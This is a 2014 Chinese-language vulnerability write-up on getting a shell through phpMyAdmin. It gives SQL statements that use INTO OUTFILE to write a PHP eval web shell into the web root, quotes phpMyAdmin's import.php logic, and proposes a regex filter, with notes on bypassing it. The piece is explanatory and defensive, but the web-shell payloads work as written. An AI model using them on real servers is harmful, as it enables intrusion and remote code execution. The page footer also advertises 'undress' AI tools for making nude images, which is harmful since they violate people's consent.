Getshell Via phpmyadmin SQL Execution In /import.php To Writ
目录 1 . 漏洞描述 2 . 漏洞触发条件 3 . 漏洞影响范围 4 . 漏洞代码分析 5 . 防御方法 6 . 攻防思考 1. 漏洞描述 phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接
目录
<span>1</span><span>. 漏洞描述 </span><span>2</span><span>. 漏洞触发条件 </span><span>3</span><span>. 漏洞影响范围 </span><span>4</span><span>. 漏洞代码分析 </span><span>5</span><span>. 防御方法 </span><span>6</span>. 攻防思考
1. 漏洞描述
phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性
2. 漏洞触发条件
<span>1</span><span>. 已知phpmyadmin的root密码,即mysql的root密码(phpmyadmin只是通过web方式连接mysql的工具)
</span><span>1</span><span>) mysql本身默认的弱口令
</span><span>2</span><span>) 通过其他漏洞(例如注入)获得了mysql的root密码
</span><span>2</span><span>. 已知网站的物理路径
</span><span>1</span>) 在phpmyadmin的后台的<span>"</span><span>变量</span><span>"</span><span>tab页面,可以看到mysql的物理路径,从而推测出网站的物理路径
</span><span>2</span>) 通过其他web漏洞获得网站的物理路径通过phpmyadmin进行getshell的核心就是通过sql进行文件写的操作,常见的sql如下
----<span>1</span>---<span> Create TABLE a (cmd text NOT NULL); Insert INTO a (cmd) VALUES(</span><span>'</span><span><?php @eval($_POST[cmd])?></span><span>'</span><span>); </span><span>select</span> cmd <span>from</span> a into outfile <span>'</span><span> C:/htdocs/1.php</span><span>'</span><span>; Drop TABLE IF EXISTS a; DROP TABLE IF EXISTS `a`; </span>----<span>1</span>--- ----<span>2</span>--- <span>select</span> <span>'</span><span><?php @eval($_POST[pass]);?></span><span>'</span>INTO OUTFILE <span>'</span><span>d:/wamp/www/exehack.php</span><span>'</span> ----<span>2</span>---
Relevant Link:
http:<span>//</span><span>www.exehack.net/681.html</span> http:<span>//</span><span>www.exehack.net/99.html</span> http:<span>//</span><span>www.187299.com/archives/1695</span>
3. 漏洞影响范围
全部phpmyadmin版本
4. 漏洞代码分析
/phpMyAdmin/import.php
所有处理用户自定义SQL解析执行的逻辑都在这个PHP文件中实现
<span>/*</span><span>
this code point is important
$import_text is the one that need to be check strictly
</span><span>*/</span>
<span>if</span><span> ($go_sql)
{
</span><span>//</span><span> parse sql query</span>
include_once <span>'</span><span>libraries/parse_analyze.inc.php</span><span>'</span><span>;
</span><span>if</span> (isset($ajax_reload) && $ajax_reload[<span>'</span><span>reload</span><span>'</span>] === <span>true</span><span>)
{
$response </span>=<span> PMA_Response::getInstance();
$response</span>->addJSON(<span>'</span><span>ajax_reload</span><span>'</span><span>, $ajax_reload);
}
PMA_executeQueryAndSendQueryResponse(
$analyzed_sql_results, </span><span>false</span>, $db, $table, <span>null</span>, $import_text, <span>null</span><span>,
$analyzed_sql_results[</span><span>'</span><span>is_affected</span><span>'</span>], <span>null</span><span>,
</span><span>null</span>, <span>null</span>, <span>null</span>, $<span>goto</span>, $pmaThemeImage, <span>null</span>, <span>null</span>, <span>null</span><span>, $sql_query,
</span><span>null</span>, <span>null</span><span>
);
}
</span><span>else</span> <span>if</span><span> ($result)
{
</span><span>//</span><span> Save a Bookmark with more than one queries (if Bookmark label given).</span>
<span>if</span> (! empty($_POST[<span>'</span><span>bkm_label</span><span>'</span>]) && !<span> empty($import_text))
{
PMA_storeTheQueryAsBookmark(
$db, $GLOBALS[</span><span>'</span><span>cfg</span><span>'</span>][<span>'</span><span>Bookmark</span><span>'</span>][<span>'</span><span>user</span><span>'</span><span>],
$import_text, $_POST[</span><span>'</span><span>bkm_label</span><span>'</span><span>],
isset($_POST[</span><span>'</span><span>bkm_replace</span><span>'</span>]) ? $_POST[<span>'</span><span>bkm_replace</span><span>'</span>] : <span>null</span><span>
);
}
$response </span>=<span> PMA_Response::getInstance();
$response</span>->isSuccess(<span>true</span><span>);
$response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::success($msg));
$response</span>-><span>addJSON(
</span><span>'</span><span>sql_query</span><span>'</span><span>,
PMA_Util::getMessage($msg, $sql_query, </span><span>'</span><span>success</span><span>'</span><span>)
);
}
</span><span>else</span> <span>if</span> ($result == <span>false</span><span>)
{
$response </span>=<span> PMA_Response::getInstance();
$response</span>->isSuccess(<span>false</span><span>);
$response</span>->addJSON(<span>'</span><span>message</span><span>'</span><span>, PMA_Message::error($msg));
}
</span><span>else</span><span>
{
$active_page </span>= $<span>goto</span><span>;
include </span><span>''</span> . $<span>goto</span><span>;
}</span>
5. 防御方法
对变量$import_text进行恶意检查是我们针对phpmyadmin执行sql导出文件getshell攻击的防御思路
<span>if</span>(preg_match(<span>"</span><span>/select.*into.*(outfile|dumpfile)/sim</span><span>"</span><span>, $import_text, $matches))
{
echo </span><span>"</span><span>request error!</span><span>"</span> . <span>"</span><span></span><span>"</span> . $matches[<span>0</span><span>];
die();
} </span>要特别注意的是,在使用PHP的正则匹配引擎的时候,需要考虑到换行场景下的bypass风险
还需要注意的,MYSQL存在很多扩展语法,例如
<span>1</span><span>. 定义存储过程 </span><span>2</span><span>. 定义函数 </span><span>3</span><span>. 定义触发器 </span><span>4</span><span>. 使用语法预处理编译 </span><span>/*</span><span> prepare stmt from 'select count(*) from information_schema.schemata'; 这里待编译的sql语句也可以进行字符变形以此进行bypass execute stmt; </span><span>*/</span>
Relevant Link:
http:<span>//</span><span>php.net/manual/en/function.preg-match.php#111573</span> http:<span>//</span><span>blog.sina.com.cn/s/blog_3fe961ae01013r8f.html</span>
6. 攻防思考
Copyright (c) 2014 LittleHann All rights reserved
Hot AI Tools
Undresser.AI Undress
AI-powered app for creating realistic nude photos
AI Clothes Remover
Online AI tool for removing clothes from photos.
Undress AI Tool
Undress images for free
Clothoff.io
AI clothes remover
AI Hentai Generator
Generate AI Hentai for free.
Hot Article
Hot Tools
Notepad++7.3.1
Easy-to-use and free code editor
SublimeText3 Chinese version
Chinese version, very easy to use
Zend Studio 13.0.1
Powerful PHP integrated development environment
Dreamweaver CS6
Visual web development tools
SublimeText3 Mac version
God-level code editing software (SublimeText3)
Hot Topics
1377
52
How to set primary key in phpmyadmin
Apr 07, 2024 pm 02:54 PM
The primary key of a table is one or more columns that uniquely identify each record in the table. Here are the steps to set a primary key: Log in to phpMyAdmin. Select database and table. Check the column you want to use as the primary key. Click "Save Changes". Primary keys provide data integrity, lookup speed, and relationship modeling benefits.
What is the difference between HQL and SQL in Hibernate framework?
Apr 17, 2024 pm 02:57 PM
HQL and SQL are compared in the Hibernate framework: HQL (1. Object-oriented syntax, 2. Database-independent queries, 3. Type safety), while SQL directly operates the database (1. Database-independent standards, 2. Complex executable queries and data manipulation).
How to add foreign keys in phpmyadmin
Apr 07, 2024 pm 02:36 PM
Adding a foreign key in phpMyAdmin can be achieved by following these steps: Select the parent table that contains the foreign key. Edit the parent table structure and add new columns in "Columns". Enable foreign key constraints and select the referencing table and key. Set update/delete operations. save Changes.
Where does the wordpress database exist?
Apr 15, 2024 pm 10:39 PM
The WordPress database is housed in a MySQL database that stores all website data and can be accessed through your hosting provider’s dashboard, FTP, or phpMyAdmin. The database name is related to the website URL or username, and access requires the use of database credentials, including name, username, password, and hostname, which are typically stored in the "wp-config.php" file.
How to delete data table in phpmyadmin
Apr 07, 2024 pm 03:00 PM
Steps to delete a data table in phpMyAdmin: Select the database and data table; click the "Action" tab; select the "Delete" option; confirm and perform the deletion operation.
Beelink EX graphics card expansion dock promises zero GPU performance loss
Aug 11, 2024 pm 09:55 PM
One of the standout features of the recently launched Beelink GTi 14is that the mini PC has a hidden PCIe x8 slot underneath. At launch, the company said that this would make it easier to connect an external graphics card to the system. Beelink has n
What kind of vulnerability does the phpmyadmin vulnerability belong to?
Apr 07, 2024 pm 01:36 PM
phpMyAdmin is susceptible to multiple vulnerabilities, including: 1. SQL injection vulnerability; 2. Cross-site scripting (XSS) vulnerability; 3. Remote code execution (RCE) vulnerability; 4. Local file inclusion (LFI) vulnerability; 5. Information disclosure Vulnerability; 6. Privilege escalation vulnerability.
How to export excel using phpmyadmin
Apr 07, 2024 pm 02:24 PM
Export data to Excel format via phpMyAdmin: After logging in to phpMyAdmin, select the database and table to export. Click the "Export" option and select "Excel" in the "Format" drop-down menu. Choose your own export columns, query options, and other export options. Click the "Dump" button to start the export and download the exported Excel file.
